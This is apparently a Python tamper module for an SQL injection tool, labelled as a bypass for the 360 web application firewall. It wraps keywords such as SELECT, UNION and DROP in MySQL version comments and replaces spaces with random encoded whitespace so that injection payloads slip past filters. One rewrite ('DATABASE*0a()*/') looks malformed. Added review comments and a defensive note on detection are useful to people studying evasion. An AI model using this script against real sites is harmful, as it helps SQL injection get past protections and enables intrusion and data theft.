#!/usr/bin/env python
"""
bypass 360waf

author: FK_T
"Fuzz自动化Bypass软WAF姿势" (English: "Automated fuzzing techniques for bypassing software WAFs")

"""
import random
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
# Module-level priority for this script, set to PRIORITY.LOW (enum imported
# from lib.core.enums).
# NOTE(review): presumably read by the host tool to order scripts when several
# are loaded together; confirm against the loader.
__priority__ = PRIORITY.LOW
def dependencies():
    """Declare prerequisites for this script; it has none, so this is a no-op."""
    return None
def tamper(payload, **kwargs):
    """
    Rewrite selected uppercase SQL keywords and all spaces in *payload*.

    Each keyword in the table below is replaced, by plain case-sensitive
    substring substitution, with a fixed string wrapped in MySQL-style
    ``/*!99999 ... */`` comment syntax. Every space character is then
    replaced with one URL-encoded whitespace token picked at random once
    per call, so a single call uses the same token throughout.

    The output is non-deterministic, so it cannot be pinned by a doctest.
    Shape of one call (``<ws>`` stands for the chosen token):

        tamper('UNION SELECT ID FROM USERS')
        -> '/*!99999union*/<ws>/*!99999select*/<ws>ID<ws>/*!99999from*/<ws>USERS'

    Defensive note: the substitutions are fixed literals, so a filter that
    matches raw keywords or literal spaces does not see them. Detection
    rules should decode URL escapes and normalise comment wrappers and
    alternative whitespace bytes before keyword matching.

    Args:
        payload: Payload string to transform; a falsy value is returned
            unchanged.
        **kwargs: Accepted for interface compatibility; not read here.

    Returns:
        The transformed payload string.
    """

    # NOTE(review): the nesting of the final return is not recoverable from
    # the rendered page; it is treated as function-level here, so an empty
    # payload is handed back unchanged. Confirm against the upstream file.
    if not payload:
        return payload

    # Order matters only in that it mirrors the original statement sequence;
    # no replacement string contains a later uppercase keyword.
    keyword_rewrites = (
        ("SELECT", "/*!99999select*/"),
        ("UNION", "/*!99999union*/"),
        ("FROM", "/*!99999from*/"),
        ("CONCAT", "/*!99999CONCAT*/"),
        ("CASE", "/*!99999CASE*/"),
        ("CAST", "/*!99999CAST*/"),
        ("DATABASE", "/*!99999DATABASE*0a()*/"),
        ("ALTER", "/*!99999ALTER*/"),
        ("DELETE", "/*!99999DELETE*/"),
        ("DROP", "/*!99999DROP*/"),
    )
    for keyword, wrapped in keyword_rewrites:
        payload = payload.replace(keyword, wrapped)

    # One token is drawn per call (even when the payload has no spaces) and
    # applied to every space.
    whitespace_tokens = ['%09', '%0a', '%0b', '%0c', '%0d', '%20', '%a0']
    chosen_token = whitespace_tokens[random.randint(0, 6)]
    return payload.replace(" ", chosen_token)